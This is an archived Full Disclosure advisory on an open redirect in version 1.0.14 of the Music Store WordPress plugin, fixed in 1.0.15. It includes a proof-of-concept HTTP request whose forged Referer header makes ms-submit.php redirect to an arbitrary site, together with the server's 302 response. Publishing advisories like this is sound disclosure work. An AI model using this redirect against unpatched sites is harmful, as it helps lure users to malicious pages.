lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <CAARZ5vrBaf2YhU_YoTphhsFb6iKYPPiPUey7bS=zEB1Hxu9btg@mail.gmail.com>
Date: Sat, 25 Jul 2015 01:51:57 +0000
From: Nitin Venkatesh <venkatesh.nitin@...il.com>
To: "fulldisclosure@...lists.org" <fulldisclosure@...lists.org>
Subject: [FD] Open Redirect Vulnerability in Music Store Wordpress Plugin
	v1.0.14

# Title: Open Redirect Vulnerability in Music Store Wordpress Plugin v1.0.14
# Submitter: Nitin Venkatesh
# Product: Music Store Wordpress Plugin
# Product URL: https://wordpress.org/plugins/music-store/
# Vulnerability Type: URL Redirection to Untrusted Site ('Open Redirect')
[CWE-601]
# Affected Versions: v1.0.14 and possibly below.
# Tested versions: v1.0.14
# Fixed Version: v1.0.15
# Link to code diff: https://plugins.trac.wordpress.org/changeset/1178058/
# Changelog: https://wordpress.org/plugins/music-store/changelog/
# CVE Status: None & Fresh

## Product Information:

Music Store is an online store for selling audio files: music, speeches,
narratives, everything audio. In Music Store, secure payments with PayPal.

## Vulnerability Description:

Adding HTTP referer to ms-core/ms-submit.php causes an Open redirect
vulnerability

## Proof of Concept:

Sample HTTP Request:

GET /wp-content/plugins/music-store/ms-core/ms-submit.php HTTP/1.1
Host: localhost
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://google.com/
Connection: keep-alive

Sample HTTP Response:

HTTP/1.1 302 Found
Date: Fri, 05 Jun 2015 15:29:19 GMT
location: https://google.com/
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html

## Solution:

Upgrade to v1.0.15

## Disclosure Timeline:

2015-06-05 - Discovered. Contacted developer.
2015-06-10 - Updated v1.0.15 released
2015-07-25 - Publishing disclosure on FD mailing list

## Disclaimer:

This disclosure is purely meant for educational purposes. I will in no way
be responsible as to how the information in this disclosure is used.

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ